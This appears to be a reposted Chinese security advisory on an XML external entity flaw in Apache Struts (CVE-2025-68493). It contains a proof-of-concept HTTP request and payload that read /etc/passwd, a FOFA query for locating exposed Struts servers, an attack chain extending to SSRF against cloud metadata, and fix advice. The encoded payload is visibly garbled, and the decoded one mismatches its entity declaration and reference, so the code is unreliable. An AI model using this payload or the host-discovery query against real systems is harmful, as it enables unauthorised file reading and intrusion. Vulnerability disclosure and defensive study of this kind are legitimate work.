【漏洞检测POC】ApacheStrutsXML外部实体注入漏洞(CVE-2025-68493)

admin
admin
admin
0
文章
0
评论
2026-01-15 14:37:15 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: ApacheStruts2.0.0-2.3.37、2.5.0-2.5.33、6.0.0-6.1.0版本因XWork未禁用XXE导致高危注入,攻击者可读/etc/passwd或SSRF;文章给出回显POC与升级6.1.1+、禁用DTD/外部实体、WAF过滤的修复方案。 综合评分: 82 文章分类: 漏洞POC,WEB安全,漏洞预警,应急响应,安全工具

cover_image

【漏洞检测POC】Apache Struts XML外部实体注入漏洞(CVE-2025-68493)

原创

金夏

金夏安全

2026年1月15日 09:52 广东

免责声明

本文仅用于技术学习和讨论。请勿使用本文所提供的内容及相关技术从事非法活动,由于传播、利用此文所提供的内容或工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果均与文章作者及本账号无关,本次测试仅供学习使用。如有内容争议或侵权,请及时私信我们!我们会立即删除并致歉。谢谢!

一、漏洞描述

Apache Struts 是一个基于MVC设计的开源Java Web应用框架。在 2.0.0至2.3.37,2.5.0至2.5.33,以及6.0.0至6.1.0 版本中,其核心组件XWork在解析XML配置文件时,未对XML外部实体(XXE)进行有效限制,导致存在高危的XML外部实体注入漏洞(CVE-2025-68493)。

攻击者可通过向存在漏洞的接口提交恶意构造的XML数据,利用外部实体引用读取服务器敏感文件(如/etc/passwd/etc/shadow),甚至发起服务器端请求伪造(SSRF)攻击,直接威胁服务器安全。

二、漏洞检测POC

POST 公众号回复“20260115”获取具体漏洞接口 HTTP/2Host:8.8.8.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Content-Length: 120Accept: text/html, application/xhtml+xml, application/xml;q=0.9, image/webp, image/apng, */*; q=0.8, application/signed-exchange; v=b3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedxmlContent=%3fxml+version%3d'1.0'%3f'><!DOCTYPE+root+[<!ENTITY+root+["!ENTITY+xse+SYSTEM+"file%3a/etc/passwd"]>]><root>26xse%3b</root>

关键Payload(URL解码后直观展示)

<?xml version='1.0'?><!DOCTYPE&nbsp;root&nbsp;[&nbsp;&nbsp;<!ENTITY %&nbsp;ext&nbsp;SYSTEM&nbsp;"file:///etc/passwd">]><root>&ext;</root>

三、fofa语法

app="Struts2"

四、漏洞利用链分析

攻击流程:

  1. 发现XML解析端点:扫描或推测Struts应用的XML处理接口
  2. 构造恶意XXE Payload:在XML中定义外部实体,指向目标系统文件(如file:///etc/passwd)或内网服务(如http://127.0.0.1/latest/meta-data/)。
  3. 发送并触发解析:将Payload通过POST请求发送至漏洞接口,触发服务器解析XML并加载外部实体。
  4. 读取敏感信息:服务器将外部实体引用的内容(如文件内容)返回在响应中,造成信息泄露。
  5. 扩大攻击:利用读取到的信息(如密钥、配置文件)或通过SSRF探测攻击内网,进一步渗透。

五、漏洞修复建议

  1. 立即升级
  • 尽快升级到Apache Struts官方已修复的版本(6.1.1及以上)。
  • 官方安全更新地址:https://struts.apache.org/
  1. 临时缓解措施
  • 在代码或配置中,对所有XML解析器显式禁用DTD和外部实体解析。例如,设置解析器属性:
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl",&nbsp;true);factory.setFeature("http://xml.org/sax/features/external-general-entities",&nbsp;false);factory.setFeature("http://xml.org/sax/features/external-parameter-entities",&nbsp;false);
  • 在应用或WAF层面,对传入的XML数据进行严格的格式和内容校验,过滤可疑的DOCTYPE和ENTITY声明。

3. 安全加固

  • 遵循最小权限原则,运行Struts应用的账户应仅拥有必要的最低文件系统访问权限。
  • 对公网暴露的Struts应用进行定期安全扫描和代码审计。

#

免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:金夏安全 金夏《【漏洞检测POC】Apache Struts XML外部实体注入漏洞(CVE-2025-68493)》

版权声明

本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。

ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
评论:0   参与:  0